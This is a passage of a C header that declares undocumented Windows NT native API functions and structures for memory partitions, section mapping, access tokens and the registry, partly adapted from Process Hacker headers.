SystemMemoryPartitionMoveMemory,\n SystemMemoryPartitionAddPagefile,\n SystemMemoryPartitionCombineMemory,\n SystemMemoryPartitionInitialAddMemory,\n SystemMemoryPartitionGetMemoryEvents,\n SystemMemoryPartitionSetAttributes,\n SystemMemoryPartitionNodeInformation,\n SystemMemoryPartitionCreateLargePages,\n SystemMemoryPartitionDedicatedMemoryInformation,\n SystemMemoryPartitionOpenDedicatedMemory,\n SystemMemoryPartitionMemoryChargeAttributes,\n SystemMemoryPartitionClearAttributes,\n SystemMemoryPartitionSetMemoryThresholds,\n SystemMemoryPartitionMemoryListCommand,\n SystemMemoryPartitionMax\n} MEMORY_PARTITION_INFORMATION_CLASS;\n\ntypedef struct _MEMORY_PARTITION_PAGE_RANGE {\n ULONG_PTR StartPage;\n ULONG_PTR NumberOfPages;\n} MEMORY_PARTITION_PAGE_RANGE, *PMEMORY_PARTITION_PAGE_RANGE;\n\ntypedef struct _MEMORY_PARTITION_INITIAL_ADD_INFORMATION {\n ULONG Flags;\n ULONG NumberOfRanges;\n ULONG_PTR NumberOfPagesAdded;\n MEMORY_PARTITION_PAGE_RANGE PartitionRanges[1];\n} MEMORY_PARTITION_INITIAL_ADD_INFORMATION, *PMEMORY_PARTITION_INITIAL_ADD_INFORMATION;\n\ntypedef struct _MEMORY_PARTITION_PAGE_COMBINE_INFORMATION {\n PVOID StopHandle;\n ULONG Flags;\n ULONG_PTR TotalNumberOfPages;\n} MEMORY_PARTITION_PAGE_COMBINE_INFORMATION, *PMEMORY_PARTITION_PAGE_COMBINE_INFORMATION;\n\ntypedef struct _MEMORY_PARTITION_PAGEFILE_INFORMATION {\n UNICODE_STRING PageFileName;\n LARGE_INTEGER MinimumSize;\n LARGE_INTEGER MaximumSize;\n ULONG Flags;\n} MEMORY_PARTITION_PAGEFILE_INFORMATION, *PMEMORY_PARTITION_PAGEFILE_INFORMATION;\n\ntypedef struct _MEMORY_PARTITION_TRANSFER_INFORMATION {\n ULONG_PTR NumberOfPages;\n ULONG NumaNode;\n ULONG Flags;\n} MEMORY_PARTITION_TRANSFER_INFORMATION, *PMEMORY_PARTITION_TRANSFER_INFORMATION;\n\ntypedef struct _MEMORY_PARTITION_CONFIGURATION_INFORMATION {\n ULONG Flags;\n ULONG NumaNode;\n ULONG Channel;\n ULONG NumberOfNumaNodes;\n ULONG_PTR ResidentAvailablePages;\n ULONG_PTR CommittedPages;\n ULONG_PTR CommitLimit;\n ULONG_PTR PeakCommitment;\n ULONG_PTR TotalNumberOfPages;\n ULONG_PTR AvailablePages;\n ULONG_PTR ZeroPages;\n ULONG_PTR FreePages;\n ULONG_PTR StandbyPages;\n\n // Fields added RS1+\n ULONG_PTR StandbyPageCountByPriority[8];\n ULONG_PTR RepurposedPagesByPriority[8];\n ULONG_PTR MaximumCommitLimit;\n ULONG_PTR DonatedPagesToPartitions;\n ULONG PartitionId;\n} MEMORY_PARTITION_CONFIGURATION_INFORMATION, * PMEMORY_PARTITION_CONFIGURATION_INFORMATION;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateSection(\n _Out_ PHANDLE SectionHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_opt_ PLARGE_INTEGER MaximumSize,\n _In_ ULONG SectionPageProtection,\n _In_ ULONG AllocationAttributes,\n _In_opt_ HANDLE FileHandle);\n\n//taken from ph2\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateSectionEx(\n _Out_ PHANDLE SectionHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_opt_ PLARGE_INTEGER MaximumSize,\n _In_ ULONG SectionPageProtection,\n _In_ ULONG AllocationAttributes,\n _In_opt_ HANDLE FileHandle,\n _Inout_updates_opt_(ExtendedParameterCount) PMEM_EXTENDED_PARAMETER ExtendedParameters,\n _In_ ULONG ExtendedParameterCount);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenSection(\n _Out_ PHANDLE SectionHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtMapViewOfSection(\n _In_ HANDLE SectionHandle,\n _In_ HANDLE ProcessHandle,\n _Inout_ _At_(*BaseAddress, _Readable_bytes_(*ViewSize) _Writable_bytes_(*ViewSize) _Post_readable_byte_size_(*ViewSize)) PVOID *BaseAddress,\n _In_ ULONG_PTR ZeroBits,\n _In_ SIZE_T CommitSize,\n _Inout_opt_ PLARGE_INTEGER SectionOffset,\n _Inout_ PSIZE_T ViewSize,\n _In_ SECTION_INHERIT InheritDisposition,\n _In_ ULONG AllocationType,\n _In_ ULONG Win32Protect);\n\n//taken from ph2\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtMapViewOfSectionEx(\n _In_ HANDLE SectionHandle,\n _In_ HANDLE ProcessHandle,\n _Inout_ _At_(*BaseAddress, _Readable_bytes_(*ViewSize) _Writable_bytes_(*ViewSize) _Post_readable_byte_size_(*ViewSize)) PVOID* BaseAddress,\n _Inout_opt_ PLARGE_INTEGER SectionOffset,\n _Inout_ PSIZE_T ViewSize,\n _In_ ULONG AllocationType,\n _In_ ULONG Win32Protect,\n _Inout_updates_opt_(ParameterCount) PMEM_EXTENDED_PARAMETER ExtendedParameters,\n _In_ ULONG ExtendedParameterCount);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtUnmapViewOfSection(\n _In_ HANDLE ProcessHandle,\n _In_opt_ PVOID BaseAddress);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtUnmapViewOfSectionEx(\n _In_ HANDLE ProcessHandle,\n _In_opt_ PVOID BaseAddress,\n _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQuerySection(\n _In_ HANDLE SectionHandle,\n _In_ SECTION_INFORMATION_CLASS SectionInformationClass,\n _Out_writes_bytes_(SectionInformationLength) PVOID SectionInformation,\n _In_ SIZE_T SectionInformationLength,\n _Out_opt_ PSIZE_T ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtExtendSection(\n _In_ HANDLE SectionHandle,\n _Inout_ PLARGE_INTEGER NewSectionSize);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtMapUserPhysicalPages(\n _In_ PVOID VirtualAddress,\n _In_ ULONG_PTR NumberOfPages,\n _In_reads_opt_(NumberOfPages) PULONG_PTR UserPfnArray);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtMapUserPhysicalPagesScatter(\n _In_reads_(NumberOfPages) PVOID *VirtualAddresses,\n _In_ ULONG_PTR NumberOfPages,\n _In_reads_opt_(NumberOfPages) PULONG_PTR UserPfnArray);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAllocateUserPhysicalPages(\n _In_ HANDLE ProcessHandle,\n _Inout_ PULONG_PTR NumberOfPages,\n _Out_writes_(*NumberOfPages) PULONG_PTR UserPfnArray);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtFreeUserPhysicalPages(\n _In_ HANDLE ProcessHandle,\n _Inout_ PULONG_PTR NumberOfPages,\n _In_reads_(*NumberOfPages) PULONG_PTR UserPfnArray);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAreMappedFilesTheSame(\n _In_ PVOID File1MappedAsAnImage,\n _In_ PVOID File2MappedAsFile);\n\n//\n// NtCreatePartition\n//\n\n//\n// 10248\n//\ntypedef NTSTATUS(NTAPI* pfnNtCreatePartitionV1)(\n _Out_ PHANDLE PartitionHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ ULONG PreferredNode);\n\n//\n// 10586\n//\ntypedef NTSTATUS(NTAPI* pfnNtCreatePartitionV2)(\n _In_ HANDLE ParentPartitionHandle,\n _Out_ HANDLE* PartitionHandle,\n _In_ ULONG DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ ULONG Node);\n\n//\n// Actual NtCreatePartition definition since Win10 10586\n//\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreatePartition(\n _In_ HANDLE ParentPartitionHandle,\n _Out_ HANDLE* PartitionHandle,\n _In_ ULONG DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ ULONG Node);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenPartition(\n _Out_ PHANDLE PartitionHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtManagePartition(\n _In_ HANDLE TargetHandle,\n _In_opt_ HANDLE SourceHandle,\n _In_ MEMORY_PARTITION_INFORMATION_CLASS PartitionInformationClass,\n _Inout_updates_bytes_(PartitionInformationLength) PVOID PartitionInformation,\n _In_ ULONG PartitionInformationLength);\n\n/************************************************************************************\n*\n* Token API.\n*\n************************************************************************************/\n//\n// This part is taken from PH ntseapi.h.\n//\n\n// Types\n\n#define TOKEN_SECURITY_ATTRIBUTE_TYPE_INVALID 0x00\n#define TOKEN_SECURITY_ATTRIBUTE_TYPE_INT64 0x01\n#define TOKEN_SECURITY_ATTRIBUTE_TYPE_UINT64 0x02\n#define TOKEN_SECURITY_ATTRIBUTE_TYPE_STRING 0x03\n#define TOKEN_SECURITY_ATTRIBUTE_TYPE_FQBN 0x04\n#define TOKEN_SECURITY_ATTRIBUTE_TYPE_SID 0x05\n#define TOKEN_SECURITY_ATTRIBUTE_TYPE_BOOLEAN 0x06\n#define TOKEN_SECURITY_ATTRIBUTE_TYPE_OCTET_STRING 0x10\n\n// Flags\n\n#define TOKEN_SECURITY_ATTRIBUTE_NON_INHERITABLE 0x0001\n#define TOKEN_SECURITY_ATTRIBUTE_VALUE_CASE_SENSITIVE 0x0002\n#define TOKEN_SECURITY_ATTRIBUTE_USE_FOR_DENY_ONLY 0x0004\n#define TOKEN_SECURITY_ATTRIBUTE_DISABLED_BY_DEFAULT 0x0008\n#define TOKEN_SECURITY_ATTRIBUTE_DISABLED 0x0010\n#define TOKEN_SECURITY_ATTRIBUTE_MANDATORY 0x0020\n#define TOKEN_SECURITY_ATTRIBUTE_COMPARE_IGNORE 0x0040\n\n#define TOKEN_SECURITY_ATTRIBUTE_VALID_FLAGS ( \\\n TOKEN_SECURITY_ATTRIBUTE_NON_INHERITABLE | \\\n TOKEN_SECURITY_ATTRIBUTE_VALUE_CASE_SENSITIVE | \\\n TOKEN_SECURITY_ATTRIBUTE_USE_FOR_DENY_ONLY | \\\n TOKEN_SECURITY_ATTRIBUTE_DISABLED_BY_DEFAULT | \\\n TOKEN_SECURITY_ATTRIBUTE_DISABLED | \\\n TOKEN_SECURITY_ATTRIBUTE_MANDATORY)\n\n#define TOKEN_SECURITY_ATTRIBUTE_CUSTOM_FLAGS 0xffff0000\n\ntypedef struct _TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE\n{\n ULONG64 Version;\n UNICODE_STRING Name;\n} TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE, *PTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE;\n\ntypedef struct _TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE\n{\n PVOID pValue;\n ULONG ValueLength;\n} TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE, *PTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE;\n\ntypedef struct _TOKEN_SECURITY_ATTRIBUTE_V1\n{\n UNICODE_STRING Name;\n USHORT ValueType;\n USHORT Reserved;\n ULONG Flags;\n ULONG ValueCount;\n union\n {\n PLONG64 pInt64;\n PULONG64 pUint64;\n PUNICODE_STRING pString;\n PTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE pFqbn;\n PTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE pOctetString;\n } Values;\n} TOKEN_SECURITY_ATTRIBUTE_V1, *PTOKEN_SECURITY_ATTRIBUTE_V1;\n\n#define TOKEN_SECURITY_ATTRIBUTES_INFORMATION_VERSION_V1 1\n#define TOKEN_SECURITY_ATTRIBUTES_INFORMATION_VERSION TOKEN_SECURITY_ATTRIBUTES_INFORMATION_VERSION_V1\n\ntypedef struct _TOKEN_SECURITY_ATTRIBUTES_INFORMATION\n{\n USHORT Version;\n USHORT Reserved;\n ULONG AttributeCount;\n union\n {\n PTOKEN_SECURITY_ATTRIBUTE_V1 pAttributeV1;\n } Attribute;\n} TOKEN_SECURITY_ATTRIBUTES_INFORMATION, *PTOKEN_SECURITY_ATTRIBUTES_INFORMATION;\n\n//\n// endof ntseapi.h\n//\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAccessCheck(\n _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n _In_ HANDLE ClientToken,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ PGENERIC_MAPPING GenericMapping,\n _Out_writes_bytes_(*PrivilegeSetLength) PPRIVILEGE_SET PrivilegeSet,\n _Inout_ PULONG PrivilegeSetLength,\n _Out_ PACCESS_MASK GrantedAccess,\n _Out_ PNTSTATUS AccessStatus);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAccessCheckByType(\n _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n _In_opt_ PSID PrincipalSelfSid,\n _In_ HANDLE ClientToken,\n _In_ ACCESS_MASK DesiredAccess,\n _In_reads_(ObjectTypeListLength) POBJECT_TYPE_LIST ObjectTypeList,\n _In_ ULONG ObjectTypeListLength,\n _In_ PGENERIC_MAPPING GenericMapping,\n _Out_writes_bytes_(*PrivilegeSetLength) PPRIVILEGE_SET PrivilegeSet,\n _Inout_ PULONG PrivilegeSetLength,\n _Out_ PACCESS_MASK GrantedAccess,\n _Out_ PNTSTATUS AccessStatus);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAccessCheckByTypeResultList(\n _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n _In_opt_ PSID PrincipalSelfSid,\n _In_ HANDLE ClientToken,\n _In_ ACCESS_MASK DesiredAccess,\n _In_reads_(ObjectTypeListLength) POBJECT_TYPE_LIST ObjectTypeList,\n _In_ ULONG ObjectTypeListLength,\n _In_ PGENERIC_MAPPING GenericMapping,\n _Out_writes_bytes_(*PrivilegeSetLength) PPRIVILEGE_SET PrivilegeSet,\n _Inout_ PULONG PrivilegeSetLength,\n _Out_writes_(ObjectTypeListLength) PACCESS_MASK GrantedAccess,\n _Out_writes_(ObjectTypeListLength) PNTSTATUS AccessStatus);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenObjectAuditAlarm(\n _In_ PUNICODE_STRING SubsystemName,\n _In_opt_ PVOID HandleId,\n _In_ PUNICODE_STRING ObjectTypeName,\n _In_ PUNICODE_STRING ObjectName,\n _In_opt_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n _In_ HANDLE ClientToken,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ ACCESS_MASK GrantedAccess,\n _In_opt_ PPRIVILEGE_SET Privileges,\n _In_ BOOLEAN ObjectCreation,\n _In_ BOOLEAN AccessGranted,\n _Out_ PBOOLEAN GenerateOnClose);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCloseObjectAuditAlarm(\n _In_ PUNICODE_STRING SubsystemName,\n _In_opt_ PVOID HandleId,\n _In_ BOOLEAN GenerateOnClose);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDeleteObjectAuditAlarm(\n _In_ PUNICODE_STRING SubsystemName,\n _In_opt_ PVOID HandleId,\n _In_ BOOLEAN GenerateOnClose);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenProcessToken(\n _In_ HANDLE ProcessHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _Out_ PHANDLE TokenHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenProcessTokenEx(\n _In_ HANDLE ProcessHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ ULONG HandleAttributes,\n _Out_ PHANDLE TokenHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDuplicateToken(\n _In_ HANDLE ExistingTokenHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ BOOLEAN EffectiveOnly,\n _In_ TOKEN_TYPE TokenType,\n _Out_ PHANDLE NewTokenHandle);\n\n#ifndef DISABLE_MAX_PRIVILEGE\n#define DISABLE_MAX_PRIVILEGE 0x1 // winnt\n#endif\n\n#ifndef SANDBOX_INERT\n#define SANDBOX_INERT 0x2 // winnt\n#endif\n\n#ifndef LUA_TOKEN\n#define LUA_TOKEN 0x4 // winnt\n#endif\n\n#ifndef WRITE_RESTRICTED\n#define WRITE_RESTRICTED 0x8 // winnt\n#endif\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtFilterToken(\n _In_ HANDLE ExistingTokenHandle,\n _In_ ULONG Flags,\n _In_opt_ PTOKEN_GROUPS SidsToDisable,\n _In_opt_ PTOKEN_PRIVILEGES PrivilegesToDelete,\n _In_opt_ PTOKEN_GROUPS RestrictedSids,\n _Out_ PHANDLE NewTokenHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtImpersonateAnonymousToken(\n _In_ HANDLE ThreadHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryInformationToken(\n _In_ HANDLE TokenHandle,\n _In_ TOKEN_INFORMATION_CLASS TokenInformationClass,\n _Out_writes_bytes_to_opt_(TokenInformationLength, *ReturnLength) PVOID TokenInformation,\n _In_ ULONG TokenInformationLength,\n _Out_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationToken(\n _In_ HANDLE TokenHandle,\n _In_ TOKEN_INFORMATION_CLASS TokenInformationClass,\n _In_reads_bytes_(TokenInformationLength) PVOID TokenInformation,\n _In_ ULONG TokenInformationLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenThreadToken(\n _In_ HANDLE ThreadHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ BOOLEAN OpenAsSelf,\n _Out_ PHANDLE TokenHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenThreadTokenEx(\n _In_ HANDLE ThreadHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ BOOLEAN OpenAsSelf,\n _In_ ULONG HandleAttributes,\n _Out_ PHANDLE TokenHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAdjustPrivilegesToken(\n _In_ HANDLE TokenHandle,\n _In_ BOOLEAN DisableAllPrivileges,\n _In_opt_ PTOKEN_PRIVILEGES NewState,\n _In_ ULONG BufferLength,\n _Out_writes_bytes_to_opt_(BufferLength, *ReturnLength) PTOKEN_PRIVILEGES PreviousState,\n _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAdjustGroupsToken(\n _In_ HANDLE TokenHandle,\n _In_ BOOLEAN ResetToDefault,\n _In_opt_ PTOKEN_GROUPS NewState,\n _In_opt_ ULONG BufferLength,\n _Out_writes_bytes_to_opt_(BufferLength, *ReturnLength) PTOKEN_GROUPS PreviousState,\n _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCompareTokens(\n _In_ HANDLE FirstTokenHandle,\n _In_ HANDLE SecondTokenHandle,\n _Out_ PBOOLEAN Equal);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtPrivilegeCheck(\n _In_ HANDLE ClientToken,\n _Inout_ PPRIVILEGE_SET RequiredPrivileges,\n _Out_ PBOOLEAN Result);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateToken(\n _Out_ PHANDLE TokenHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ TOKEN_TYPE TokenType,\n _In_ PLUID AuthenticationId,\n _In_ PLARGE_INTEGER ExpirationTime,\n _In_ PTOKEN_USER User,\n _In_ PTOKEN_GROUPS Groups,\n _In_ PTOKEN_PRIVILEGES Privileges,\n _In_opt_ PTOKEN_OWNER Owner,\n _In_ PTOKEN_PRIMARY_GROUP PrimaryGroup,\n _In_opt_ PTOKEN_DEFAULT_DACL DefaultDacl,\n _In_ PTOKEN_SOURCE TokenSource);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateTokenEx(\n _Out_ PHANDLE TokenHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ TOKEN_TYPE TokenType,\n _In_ PLUID AuthenticationId,\n _In_ PLARGE_INTEGER ExpirationTime,\n _In_ PTOKEN_USER User,\n _In_ PTOKEN_GROUPS Groups,\n _In_ PTOKEN_PRIVILEGES Privileges,\n _In_opt_ PVOID UserAttributes, // points to TOKEN_SECURITY_ATTRIBUTES_INFORMATION\n _In_opt_ PVOID DeviceAttributes, // points to PTOKEN_SECURITY_ATTRIBUTES_INFORMATION\n _In_opt_ PTOKEN_GROUPS DeviceGroups,\n _In_opt_ PTOKEN_MANDATORY_POLICY TokenMandatoryPolicy,\n _In_opt_ PTOKEN_OWNER Owner,\n _In_ PTOKEN_PRIMARY_GROUP PrimaryGroup,\n _In_opt_ PTOKEN_DEFAULT_DACL DefaultDacl,\n _In_ PTOKEN_SOURCE TokenSource);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateLowBoxToken(\n _Out_ PHANDLE TokenHandle,\n _In_ HANDLE ExistingTokenHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ PSID PackageSid,\n _In_ ULONG CapabilityCount,\n _In_reads_opt_(CapabilityCount) PSID_AND_ATTRIBUTES Capabilities,\n _In_ ULONG HandleCount,\n _In_reads_opt_(HandleCount) HANDLE *Handles);\n\n/************************************************************************************\n*\n* Registry API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateKey(\n _Out_ PHANDLE KeyHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _Reserved_ ULONG TitleIndex,\n _In_opt_ PUNICODE_STRING Class,\n _In_ ULONG CreateOptions,\n _Out_opt_ PULONG Disposition);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateKeyTransacted(\n _Out_ PHANDLE KeyHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _Reserved_ ULONG TitleIndex,\n _In_opt_ PUNICODE_STRING Class,\n _In_ ULONG CreateOptions,\n _In_ HANDLE TransactionHandle,\n _Out_opt_ PULONG Disposition);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenKey(\n _Out_ PHANDLE KeyHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenKeyEx(\n _Out_ PHANDLE KeyHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ ULONG OpenOptions);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenKeyTransacted(\n _Out_ PHANDLE KeyHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ HANDLE TransactionHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenKeyTransactedEx(\n _Out_ PHANDLE KeyHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ ULONG OpenOptions,\n _In_ HANDLE TransactionHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryKey(\n _In_ HANDLE KeyHandle,\n _In_ KEY_INFORMATION_CLASS KeyInformationClass,\n _Out_writes_bytes_opt_(Length) PVOID KeyInformation,\n _In_ ULONG Length,\n _Out_ PULONG ResultLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtEnumerateKey(\n _In_ HANDLE KeyHandle,\n _In_ ULONG Index,\n _In_ KEY_INFORMATION_CLASS KeyInformationClass,\n _Out_writes_bytes_opt_(Length) PVOID KeyInformation,\n _In_ ULONG Length,\n _Out_ PULONG ResultLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtEnumerateValueKey(\n _In_ HANDLE KeyHandle,\n _In_ ULONG Index,\n _In_ KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,\n _Out_writes_bytes_opt_(Length) PVOID KeyValueInformation,\n _In_ ULONG Length,\n _Out_ PULONG ResultLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryValueKey(\n _In_ HANDLE KeyHandle,\n _In_ PUNICODE_STRING ValueName,\n _In_ KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,\n _Out_writes_bytes_opt_(Length) PVOID KeyValueInformation,\n _In_ ULONG Length,\n _Out_ PULONG ResultLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryMultipleValueKey(\n _In_ HANDLE KeyHandle,\n _Inout_updates_(EntryCount) PKEY_VALUE_ENTRY ValueEntries,\n _In_ ULONG EntryCount,\n _Out_writes_bytes_(*BufferLength) PVOID ValueBuffer,\n _Inout_ PULONG BufferLength,\n _Out_opt_ PULONG RequiredBufferLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetValueKey(\n _In_ HANDLE KeyHandle,\n _In_ PUNICODE_STRING ValueName,\n _In_ ULONG TitleIndex,\n _In_ ULONG Type,\n _In_reads_bytes_opt_(DataSize) PVOID Data,\n _In_ ULONG DataSize);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDeleteKey(\n _In_ HANDLE KeyHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDeleteValueKey(\n _In_ HANDLE KeyHandle,\n _In_ PUNICODE_STRING ValueName);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtRenameKey(\n _In_ HANDLE KeyHandle,\n _In_ PUNICODE_STRING NewName);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationKey(\n _In_ HANDLE KeyHandle,\n _In_ KEY_SET_INFORMATION_CLASS KeySetInformationClass,\n _In_reads_bytes_(KeySetInformationLength) PVOID KeySetInformation,\n _In_ ULONG KeySetInformationLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtFlushKey(\n _In_ HANDLE KeyHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCompressKey(\n _In_ HANDLE Key);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLoadKey(\n _In_ POBJECT_ATTRIBUTES TargetKey,\n _In_ POBJECT_ATTRIBUTES SourceFile);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLoadKey2(\n _In_ POBJECT_ATTRIBUTES TargetKey,\n _In_ POBJECT_ATTRIBUTES SourceFile,\n _In_ ULONG Flags);\n\n//https://gist.github.com/tyranid/1db47869da253a912242c694e921009d#file-ntloadkeyex3-h\n\ntypedef enum _KEY_LOAD_HANDLE_TYPE {\n KeyLoadTrustKey = 1,\n KeyLoadEvent,\n KeyLoadToken\n} KEY_LOAD_HANDLE_TYPE;\n\ntypedef struct _KEY_LOAD_HANDLE {\n KEY_LOAD_HANDLE_TYPE Type;\n HANDLE Handle;\n} KEY_LOAD_HANDLE, *PKEY_LOAD_HANDLE;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLoadKey3(\n _In_ POBJECT_ATTRIBUTES TargetKey,\n _In_ POBJECT_ATTRIBUTES SourceFile,\n _In_ ULONG Flags,\n _In_ PKEY_LOAD_HANDLE LoadEntries,\n _In_ ULONG LoadEntryCount,\n _In_opt_ ACCESS_MASK DesiredAccess,\n _Out_opt_ PHANDLE RootHandle,\n _In_ PVOID Unused);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLoadKeyEx(\n _In_ POBJECT_ATTRIBUTES TargetKey,\n _In_ POBJECT_ATTRIBUTES SourceFile,\n _In_ ULONG Flags,\n _In_opt_ HANDLE TrustClassKey,\n _In_opt_ HANDLE Event,\n _In_opt_ ACCESS_MASK DesiredAccess,\n _Out_opt_ PHANDLE RootHandle,\n _Out_opt_ PIO_STATUS_BLOCK IoStatus);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSaveKey(\n _In_ HANDLE KeyHandle,\n _In_ HANDLE FileHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSaveKeyEx(\n _In_ HANDLE KeyHandle,\n _In_ HANDLE FileHandle,\n _In_ ULONG Format);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtUnloadKey(\n _In_ POBJECT_ATTRIBUTES TargetKey);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtUnloadKey2(\n _In_ POBJECT_ATTRIBUTES TargetKey,\n _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtUnloadKeyEx(\n _In_ POBJECT_ATTRIBUTES TargetKey,\n _In_opt_ HANDLE Event);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtNotifyChangeKey(\n _In_ HANDLE KeyHandle,\n _In_opt_ HANDLE Event,\n _In_opt_ 